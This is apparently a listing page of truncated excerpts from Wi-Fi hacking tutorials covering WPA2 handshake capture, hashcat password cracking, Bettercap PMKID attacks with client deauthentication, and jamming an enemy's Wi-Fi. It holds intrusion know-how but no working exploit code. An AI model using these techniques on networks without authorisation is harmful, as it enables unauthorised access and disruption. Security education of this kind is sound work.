Cyber Creatures

When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy (WEP) was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked.  As a replacement, most wireless access points now use Wi-Fi Protected Access 2 with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that's very difficult to crack—but not impossible. My beginner's Wi-Fi hacking guide also gives more information on this. The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it. In this tutorial from our Wireless Hacking series, we'll look at using aircrack-ng and a dictionary attack on the encrypted passwor...

Continuing with my series on how to crack passwords, I now want to introduce you to one of the newest and best designed password crackers out there—hashcat. The beauty of hashcat is in its design, which focuses on speed and versatility. It enables us to crack multiple types of hashes, in multiple ways, very fast. As mentioned in the first part of this series, passwords are stored in a one-way encryption called hashes. There are multiple ways of obtaining these hashes, such as .dll injection in Windows systems or capturing the hash in transit, such as in WPA2 wireless cracking. Once we can grab the hash, the next step becomes one of finding an effective and efficient way of cracking it. There are numerous tools, some of which I have highlighted in other articles here, but hashcat is unique in its design and versatility, so let's take a look at how it works. Step 1: Fire Up Kali & Open Hashcat ​Let's start by firing up Kali and opening hashcat. Go to Applications -> Kali L...

 Bettercap Many of you are familiar with Bettercap as an excellent MiTM attack framework but it can also be used to attack Wi-Fi AP's as well. In this tutorial, we will be using this versatile tool, Bettercap, to find Wi-Fi AP's, de-authenticate the clients and capture their hashes with the PMKID attack. Step 1: Install Bettercap There are a number of ways of installing Bettercap but probably the easiest is to download and install from the Kali repository sudo apt install bettercap In addition, you can install the dependencies and the do a gem install  sudo gem install bettercap Step 2: Check your Wi-Fi Adapter Next, we need to check our Wi-Fi adapter. If you are using a VM such as VirtualBox or VMware Workstation, you will likely need an external USB Wi-Fi adapter (I'm using the Alfa card. Its simple, inexpensive and most importantly, it works!).  Use the ifconfig command in Linux to find the name of your adapter. sudo ifconfig Note that my adapter is named wlan0. Yours ...

 In previous tutorials for my Wi-Fi Hacking series, I have shown you how to crack WEP and WPA2 passwords, break a WPS PIN, and create Evil Twin and Rogue access points. In this continuation of the series, let's look at slightly different approach to attacking wireless. (If you are new to hacking Wi-Fi, make sure you check out the getting started guide before attempting any of the tasks mentioned above.) Our Cyber War Scenario ​Your side, the good guys, of course, are about to launch an attack against the bad guys. Your mission is to knock out all of the wireless communication from their field command and control center so that your army can attack without any notifications being sent via Wi-Fi. Of course, in this scenario, we are only knocking out Wi-Fi communication. The bad guys could certainly still communicate by cellular phone, by wired communication, by satellite, etc., but those are the tasks of your compatriots. Your single task is to knock out their Wi-Fi communication ind...